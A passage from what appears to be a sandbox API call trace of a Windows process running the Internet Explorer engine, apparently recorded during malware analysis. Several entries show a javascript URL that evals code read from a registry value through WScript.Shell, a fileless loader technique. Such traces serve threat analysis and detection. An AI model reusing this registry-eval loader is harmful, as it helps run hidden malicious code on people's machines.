(This=0x6505a4) returned 0x4 [0075.433] IUnknown:Release (This=0x6505a0) returned 0x3 [0075.433] IUnknown:Release (This=0x64e618) returned 0x1 [0075.433] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x64f808 | out: hHeap=0x610000) returned 1 [0075.433] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x644d58 | out: hHeap=0x610000) returned 1 [0075.433] GetCurrentThreadId () returned 0x2a8 [0075.433] GetCurrentThreadId () returned 0x2a8 [0075.433] SetEvent (hEvent=0x150) returned 1 [0075.435] CoTaskMemFree (pv=0x0) [0075.435] IInternetProtocolRoot:Terminate (This=0x652acc, dwOptions=0x0) returned 0x0 [0075.435] IUnknown:Release (This=0x652208) returned 0x4 [0075.435] ReleaseBindInfo (pbindinfo=0x652af0) [0075.435] IUnknown:Release (This=0x652ab8) returned 0x0 [0075.435] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x63d838 | out: hHeap=0x610000) returned 1 [0075.436] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x652ab8 | out: hHeap=0x610000) returned 1 [0075.436] GetMessageW (in: lpMsg=0x18f8e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x18f8e4) returned 1 [0075.436] TranslateMessage (lpMsg=0x18f8e4) returned 0 [0075.436] DispatchMessageW (lpMsg=0x18f8e4) returned 0x0 [0075.436] GetMessageW (in: lpMsg=0x18f8e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x18f8e4) returned 1 [0075.436] TranslateMessage (lpMsg=0x18f8e4) returned 0 [0075.436] DispatchMessageW (lpMsg=0x18f8e4) returned 0x0 [0075.436] ScreenToClient (in: hWnd=0x202aa, lpPoint=0x18f1e0 | out: lpPoint=0x18f1e0) returned 1 [0075.436] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0x30) returned 0x658ba8 [0075.436] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0x28) returned 0x650760 [0075.437] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x658ba8 | out: hHeap=0x610000) returned 1 [0075.437] ScreenToClient (in: hWnd=0x202aa, lpPoint=0x18f070 | out: lpPoint=0x18f070) returned 1 [0075.437] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0x30) returned 0x658ba8 [0075.437] GetCurrentThreadId () returned 0x2a8 [0075.437] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x658ba8 | out: hHeap=0x610000) returned 1 [0075.437] GetCurrentThreadId () returned 0x2a8 [0075.437] GetCurrentThreadId () returned 0x2a8 [0075.437] DestroyWindow (hWnd=0x40162) returned 1 [0075.438] NtdllDefWindowProc_W () returned 0x0 [0075.446] NtdllDefWindowProc_W () returned 0x1 [0075.446] NtdllDefWindowProc_W () returned 0x0 [0075.447] NtdllDefWindowProc_W () returned 0x0 [0075.448] NtdllDefWindowProc_W () returned 0x0 [0075.448] NtdllDefWindowProc_W () returned 0x0 [0075.448] NtdllDefWindowProc_W () returned 0x0 [0075.448] GetWindowLongW (hWnd=0x202aa, nIndex=-21) returned 6562296 [0075.448] GetParent (hWnd=0x202aa) returned 0x40162 [0075.448] GetParent (hWnd=0x40162) returned 0x50116 [0075.448] GetParent (hWnd=0x50116) returned 0x0 [0075.448] PostMessageW (hWnd=0x202aa, Msg=0x491, wParam=0x0, lParam=0x0) returned 1 [0075.448] GetMessageTime () returned 125580 [0075.448] GetMessagePos () returned 0x35603df [0075.448] ScreenToClient (in: hWnd=0x202aa, lpPoint=0x18f240 | out: lpPoint=0x18f240) returned 1 [0075.449] ScreenToClient (in: hWnd=0x202aa, lpPoint=0x18f240 | out: lpPoint=0x18f240) returned 1 [0075.449] GetCapture () returned 0x0 [0075.449] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0x30) returned 0x658ba8 [0075.449] GetCurrentThreadId () returned 0x2a8 [0075.449] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x658ba8 | out: hHeap=0x610000) returned 1 [0075.449] GetCurrentThreadId () returned 0x2a8 [0075.449] GetCurrentThreadId () returned 0x2a8 [0075.449] CActiveIMMAppEx_Trident:IActiveIMMApp:OnDefWindowProc (in: This=0x644ee8, hWnd=0x202aa, msg=0x8, wParam=0x0, lParam=0x0, plResult=0x18f47c | out: plResult=0x18f47c) returned 0x1 [0075.449] NtdllDefWindowProc_W () returned 0x0 [0075.449] GetCurrentThreadId () returned 0x2a8 [0075.449] GetWindowLongW (hWnd=0x202aa, nIndex=-21) returned 6562296 [0075.450] GetMessageTime () returned 125580 [0075.450] GetMessagePos () returned 0x35603df [0075.450] CActiveIMMAppEx_Trident:IActiveIMMApp:OnDefWindowProc (in: This=0x644ee8, hWnd=0x202aa, msg=0x281, wParam=0x0, lParam=0xc000000f, plResult=0x18f084 | out: plResult=0x18f084) returned 0x0 [0075.450] GetWindowLongW (hWnd=0x202aa, nIndex=-21) returned 6562296 [0075.450] GetMessageTime () returned 125580 [0075.450] GetMessagePos () returned 0x35603df [0075.450] CActiveIMMAppEx_Trident:IActiveIMMApp:OnDefWindowProc (in: This=0x644ee8, hWnd=0x202aa, msg=0x282, wParam=0x1, lParam=0x0, plResult=0x18eab4 | out: plResult=0x18eab4) returned 0x0 [0075.450] GetCurrentThreadId () returned 0x2a8 [0075.450] GetCurrentThreadId () returned 0x2a8 [0075.450] PostQuitMessage (nExitCode=0) [0075.450] GetWindowLongW (hWnd=0x202aa, nIndex=-21) returned 6562296 [0075.451] RevokeDragDrop (hwnd=0x202aa) returned 0x0 [0075.451] GetCurrentThreadId () returned 0x2a8 [0075.451] GetWindowLongW (hWnd=0x202aa, nIndex=-21) returned 6562296 [0075.451] CActiveIMMAppEx_Trident:IActiveIMMApp:OnDefWindowProc (in: This=0x644ee8, hWnd=0x202aa, msg=0x82, wParam=0x0, lParam=0x0, plResult=0x18f5f8 | out: plResult=0x18f5f8) returned 0x1 [0075.451] NtdllDefWindowProc_W () returned 0x0 [0075.451] GetCurrentThreadId () returned 0x2a8 [0075.451] SetWindowLongW (hWnd=0x202aa, nIndex=-21, dwNewLong=0) returned 6562296 [0075.451] NtdllDefWindowProc_W () returned 0x0 [0075.452] GetMessageW (in: lpMsg=0x18f8e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x18f8e4) returned 1 [0075.452] TranslateMessage (lpMsg=0x18f8e4) returned 0 [0075.452] DispatchMessageW (lpMsg=0x18f8e4) returned 0x0 [0075.452] ParseURLW (in: pcszURL="javascript:eval(new ActiveXObject('WScript.Shell').RegRead('HKCU\\\\Software\\\\[M[ZF\\\\HMEYE'));close();", ppu=0x18f3c0 | out: ppu=0x18f3c0) returned 0x0 [0075.452] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0075.452] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0075.452] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0075.453] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0x28) returned 0x650ac0 [0075.453] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0x4c) returned 0x6510c8 [0075.453] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0x10) returned 0x686fb8 [0075.453] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0x28) returned 0x650c40 [0075.453] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0x4c) returned 0x651438 [0075.453] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0x68) returned 0x6875f0 [0075.453] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0x30) returned 0x658ba8 [0075.453] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0x4c) returned 0x651598 [0075.454] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x6875f0 | out: hHeap=0x610000) returned 1 [0075.454] GetSystemDefaultLCID () returned 0x409 [0075.454] GetVersionExW (in: lpVersionInformation=0x18f338*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x202aa, dwMinorVersion=0x18f350, dwBuildNumber=0x340808, dwPlatformId=0x77c6e36c, szCSDVersion="\x0f\x95v") | out: lpVersionInformation=0x18f338*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0075.454] GetKeyboardLayoutList (in: nBuff=32, lpList=0x18f2b8 | out: lpList=0x18f2b8) returned 1 [0075.454] GetSystemMetrics (nIndex=4096) returned 0 [0075.454] RegisterClipboardFormatA (lpszFormat="HTML Format") returned 0xc0cd [0075.454] RegisterClipboardFormatA (lpszFormat="Rich Text Format") returned 0xc0b1 [0075.454] RegisterClipboardFormatA (lpszFormat="RTF As Text") returned 0xc0b4 [0075.454] RegisterClipboardFormatW (lpszFormat="FileGroupDescriptor") returned 0xc0c8 [0075.454] RegisterClipboardFormatW (lpszFormat="FileGroupDescriptorW") returned 0xc0c9 [0075.454] RegisterClipboardFormatW (lpszFormat="FileContents") returned 0xc0c7 [0075.454] RegisterClipboardFormatW (lpszFormat="Shell IDList Array") returned 0xc07a [0075.454] RegisterClipboardFormatW (lpszFormat="UniformResourceLocator") returned 0xc0d1 [0075.454] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0x2c) returned 0x6589e8 [0075.454] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0x4c) returned 0x6515f0 [0075.454] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0x64) returned 0x6875f0 [0075.454] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x6875f0 | out: hHeap=0x610000) returned 1 [0075.456] SetTimer (hWnd=0x40162, nIDEvent=0x1008, uElapse=0x64, lpTimerFunc=0x0) returned 0x0 [0075.456] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0075.456] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0x10) returned 0x6870c0 [0075.456] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x62d830 | out: hHeap=0x610000) returned 1 [0075.456] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x64f7f0 | out: hHeap=0x610000) returned 1 [0075.456] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0x50) returned 0x651648 [0075.456] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x651648 | out: hHeap=0x610000) returned 1 [0075.456] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0075.456] IUnknown:AddRef (This=0x63be1c) returned 0x4 [0075.456] IInternetSecurityManager:MapUrlToZone (in: This=0x750296bc, pwszUrl="javascript:eval(new ActiveXObject('WScript.Shell').RegRead('HKCU\\\\Software\\\\[M[ZF\\\\HMEYE'));close();", pdwZone=0x18f37c, dwFlags=0x0 | out: pdwZone=0x18f37c*=0xffffffff) returned 0x800c0011 [0075.457] CoInternetIsFeatureEnabled (FeatureEntry=0x8, dwFlags=0x2) returned 0x1 [0075.457] CoInternetIsFeatureEnabled (FeatureEntry=0x8, dwFlags=0x2) returned 0x1 [0075.457] CoInternetIsFeatureEnabled (FeatureEntry=0xe, dwFlags=0x2) returned 0x1 [0075.457] IInternetSecurityManager:ProcessUrlAction (in: This=0x750296bc, pwszUrl="javascript:eval(new ActiveXObject('WScript.Shell').RegRead('HKCU\\\\Software\\\\[M[ZF\\\\HMEYE'));close();", dwAction=0x2106, pPolicy=0x18f380, cbPolicy=0x4, pContext=0x0, cbContext=0x0, dwFlags=0x41, dwReserved=0x0 | out: pPolicy=0x18f380*=0x0) returned 0x0 [0075.457] IUnknown:Release (This=0x63be1c) returned 0x3 [0075.457] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0x50) returned 0x651648 [0075.457] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x651648 | out: hHeap=0x610000) returned 1 [0075.457] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0075.457] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0x50) returned 0x651648 [0075.457] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x651648 | out: hHeap=0x610000) returned 1 [0075.457] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0075.457] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0x50) returned 0x651648 [0075.457] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x651648 | out: hHeap=0x610000) returned 1 [0075.457] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0075.457] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0x100) returned 0x6833a0 [0075.458] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0075.458] RedrawWindow (hWnd=0x0, lprcUpdate=0x0, hrgnUpdate=0x0, flags=0xa1) returned 1 [0075.463] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x686fb8 | out: hHeap=0x610000) returned 1 [0075.463] RtlReAllocateHeap (Heap=0x610000, Flags=0x0, Ptr=0x6499b0, Size=0x14) returned 0x6499b0 [0075.463] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0075.463] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x63d328 | out: hHeap=0x610000) returned 1 [0075.463] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x6870c0 | out: hHeap=0x610000) returned 1 [0075.464] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x650270 | out: hHeap=0x610000) returned 1 [0075.464] IUnknown:Release (This=0x63c68c) returned 0xa [0075.464] IUnknown:Release (This=0x63c68c) returned 0x9 [0075.464] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0075.464] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0075.464] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x693fe8 | out: hHeap=0x610000) returned 1 [0075.464] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x652b58 | out: hHeap=0x610000) returned 1 [0075.464] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0075.464] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0075.464] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0075.464] IUnknown:Release (This=0x63c68c) returned 0x8 [0075.464] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0075.464] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0075.464] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0075.465] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0075.465] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0075.465] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0075.465] IUnknown:Release (This=0x63c68c) returned 0x7 [0075.465] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0075.465] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0075.465] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x651070 | out: hHeap=0x610000) returned 1 [0075.465] IUnknown:Release (This=0x63c68c) returned 0x6 [0075.465] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0075.465] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0075.465] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0075.465] IUnknown:Release (This=0x63c68c) returned 0x5 [0075.465] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x650590 | out: hHeap=0x610000) returned 1 [0075.465] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x6502d8 | out: hHeap=0x610000) returned 1 [0075.465] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0075.465] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x650410 | out: hHeap=0x610000) returned 1 [0075.465] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0075.465] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0075.465] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0075.465] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0075.466] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x63f290 | out: hHeap=0x610000) returned 1 [0075.466] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0075.466] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0075.466] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x650480 | out: hHeap=0x610000) returned 1 [0075.466] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x651018 | out: hHeap=0x610000) returned 1 [0075.466] GetCurrentThreadId () returned 0x2a8 [0075.466] GetCurrentThreadId () returned 0x2a8 [0075.466] GetCurrentThreadId () returned 0x2a8 [0075.466] GetCurrentThreadId () returned 0x2a8 [0075.466] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0xc) returned 0x63f290 [0075.466] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0x64) returned 0x6875f0 [0075.590] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0xec) returned 0x67b670 [0075.590] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0075.590] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0075.592] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0xdc) returned 0x67b768 [0075.592] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0x30) returned 0x62d830 [0075.593] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0x250) returned 0x68d9d8 [0075.593] LsGetRubyLsimethods () returned 0x0 [0075.593] LsGetTatenakayokoLsimethods () returned 0x0 [0075.593] LsGetHihLsimethods () returned 0x0 [0075.593] LsGetWarichuLsimethods () returned 0x0 [0075.593] LsGetReverseLsimethods () returned 0x0 [0075.593] LsCreateContext () returned 0x0 [0075.593] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0x670) returned 0x677338 [0075.593] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0x24) returned 0x650a90 [0075.593] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0x110) returned 0x6650a0 [0075.593] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0x24) returned 0x682b98 [0075.593] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0x2e4) returned 0x68d2f8 [0075.593] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0x20) returned 0x63a868 [0075.594] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0x20) returned 0x685968 [0075.594] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0xa0) returned 0x679bc8 [0075.594] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0x40) returned 0x65eb70 [0075.594] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0x20) returned 0x685a30 [0075.594] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0x20) returned 0x6859e0 [0075.594] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0x20) returned 0x685918 [0075.594] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0x20) returned 0x685a80 [0075.594] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0x400) returned 0x67d058 [0075.594] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0x8) returned 0x65cb18 [0075.594] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0x8) returned 0x65ca58 [0075.594] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0x8) returned 0x65ca48 [0075.594] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0x8) returned 0x65ca68 [0075.594] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0x128) returned 0x68d5e8 [0075.594] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0x11c) returned 0x650270 [0075.594] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0x108) returned 0x68dc30 [0075.594] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0x130) returned 0x650398 [0075.595] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0x110) returned 0x6651b8 [0075.595] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0x278) returned 0x651fc0 [0075.595] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0xc8) returned 0x67b850 [0075.595] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0x190) returned 0x6504d0 [0075.595] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0x78) returned 0x622e00 [0075.595] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0xf0) returned 0x652240 [0075.595] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0x4c) returned 0x651018 [0075.595] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0x194) returned 0x652338 [0075.595] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0xc8) returned 0x650668 [0075.595] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0x190) returned 0x67a4f0 [0075.595] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0x108) returned 0x67a688 [0075.595] LsSetModWidthPairs () returned 0x0 [0075.595] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0x240) returned 0x67a798 [0075.595] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0x18) returned 0x66bec0 [0075.595] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0x20) returned 0x685ad0 [0075.596] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0x10) returned 0x6870c0 [0075.596] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0x2e0) returned 0x679dd8 [0075.596] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0x24) returned 0x682c88 [0075.597] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0xc0) returned 0x67a0c0 [0075.597] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0xc0) returned 0x67a188 [0075.597] LsSetBreaking () returned 0x0 [0075.598] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0x271) returned 0x652528 [0075.598] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0xa) returned 0x686fb8 [0075.598] LsSetDoc () returned 0x0 [0075.598] IBindStatusCallback:OnLowResource (This=0x65cb18, reserved=0x6774e4) returned 0x0 [0075.598] IBindStatusCallback:OnLowResource (This=0x65ca58, reserved=0x6774e4) returned 0x0 [0075.598] IBindStatusCallback:OnLowResource (This=0x65ca48, reserved=0x6774e4) returned 0x0 [0075.598] IBindStatusCallback:OnLowResource (This=0x65ca68, reserved=0x6774e4) returned 0x0 [0075.598] LsCreateLine () returned 0x0 [0075.598] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0075.598] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0xb4) returned 0x694000 [0075.598] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0xb4) returned 0x6940c0 [0075.598] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0xf8) returned 0x67a250 [0075.598] EnumFontsW (hdc=0x3010a0f, lpLogfont="Times New Roman", lpProc=0x74c40b47, lParam=0x18e6e4) returned 1 [0075.600] CreateFontIndirectW (lplf=0x18e680) returned 0x170a08ae [0075.600] SelectObject (hdc=0x3010a0f, h=0x170a08ae) returned 0x18a002e [0075.600] GetTextMetricsW (in: hdc=0x3010a0f, lptm=0x18e5e8 | out: lptm=0x18e5e8) returned 1 [0075.604] GetOutlineTextMetricsW (in: hdc=0x3010a0f, cjCopy=0xd8, potm=0x18e4e8 | out: potm=0x18e4e8) returned 0xd8 [0075.605] SelectObject (hdc=0x3010a0f, h=0x18a002e) returned 0x170a08ae [0075.605] SelectObject (hdc=0x3010a0f, h=0x170a08ae) returned 0x18a002e [0075.605] GetTextFaceW (in: hdc=0x3010a0f, c=32, lpName=0x18e738 | out: lpName="Times New Roman") returned 16 [0075.605] SelectObject (hdc=0x3010a0f, h=0x18a002e) returned 0x170a08ae [0075.605] SelectObject (hdc=0x3010a0f, h=0x170a08ae) returned 0x18a002e [0075.605] GetTextCharsetInfo (in: hdc=0x3010a0f, lpSig=0x18e6a0, dwFlags=0x0 | out: lpSig=0x18e6a0) returned 0 [0075.605] SelectObject (hdc=0x3010a0f, h=0x18a002e) returned 0x170a08ae [0075.605] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0xc) returned 0x686f88 [0075.605] SelectObject (hdc=0x3010a0f, h=0x170a08ae) returned 0x18a002e [0075.605] GetFontUnicodeRanges (in: hdc=0x3010a0f, lpgs=0x0 | out: lpgs=0x0) returned 0x27c [0075.605] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0075.605] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0x27c) returned 0x649c88 [0075.605] GetFontUnicodeRanges (in: hdc=0x3010a0f, lpgs=0x649c88 | out: lpgs=0x649c88) returned 0x27c [0075.605] SelectObject (hdc=0x3010a0f, h=0x18a002e) returned 0x170a08ae [0075.605] SelectObject (hdc=0x3010a0f, h=0x170a08ae) returned 0x18a002e [0075.605] GetCharWidth32W (in: hdc=0x3010a0f, iFirst=0x20, iLast=0x7e, lpBuffer=0x18e678 | out: lpBuffer=0x18e678) returned 1 [0075.608] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0x17c) returned 0x692000 [0075.608] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0x800) returned 0x649f10 [0075.608] SelectObject (hdc=0x3010a0f, h=0x18a002e) returned 0x170a08ae [0075.609] LsQueryLineDup () returned 0x0 [0075.609] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0xb4) returned 0x694180 [0075.609] LsDestroyLine () returned 0x0 [0075.609] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0075.609] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0x60) returned 0x65d208 [0075.609] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0x40) returned 0x65ebb8 [0075.610] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x679dd8 | out: hHeap=0x610000) returned 1 [0075.610] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0075.610] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0075.610] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0075.610] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0075.610] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0075.610] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0075.610] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0075.610] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: 